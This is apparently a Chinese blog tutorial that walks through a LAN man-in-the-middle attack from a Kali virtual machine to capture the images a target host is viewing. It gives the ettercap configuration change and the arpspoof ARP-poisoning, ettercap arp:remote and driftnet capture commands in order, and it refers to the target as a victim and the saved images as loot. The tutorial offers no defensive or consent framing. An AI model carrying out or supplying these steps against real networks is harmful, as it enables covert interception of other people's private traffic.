试验需求:
kali虚拟机、目标主机、
你的kali虚拟机和目标主机在同一个网段

先修改 ettercap配置文件( vim /etc/ettercap/etter.conf),找到下图的信息,把数值改为0 不会使用vim?点击这里

kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具

kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具
修改成这样就行啦

arpspoof断网攻击(arp攻击)

kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具
如图输入 arpspoof -i 网卡 -t 目标主机 网关地址(根据你实际情况填写,不要完全抄博主的啊)

使用driftnet获取图片

新开一个终端界面,最好先新建个文件夹
输入 mkdir 名称
kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具
启动driftnet,输入 driftnet -i eth0 -b -a -d 目录
kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具
driftnet窗口这就启动啦,图片会保存到刚刚的目录里

启用arp转发(arp欺骗)

新建一个终端窗口输入 ettercap -i 网卡 -Tq -M arp:remote /// /// (大小写不要错啦,斜杠别丢啦)
kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具
如上图就正常启动啦,这时候受害者(目标)访问 带图片的网站,你这边driftnet窗口就会有显示啦,如下图

kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具
这些就是弄到手的图片,也可以用图形化界面去你新建的文件夹里看看。
kali虚拟机实现局域网嗅探目标正在访问的图片----ettercap工具

好啦,完工

相关文章:

  • 2022-12-23
  • 2021-06-13
  • 2022-02-18
  • 2021-12-28
  • 2021-06-12
  • 2021-12-12
  • 2021-07-31
  • 2021-04-15
猜你喜欢
  • 2021-07-10
  • 2021-08-03
  • 2021-05-22
  • 2022-02-06
  • 2021-11-02
  • 2022-03-15
  • 2021-12-09
相关资源
相似解决方案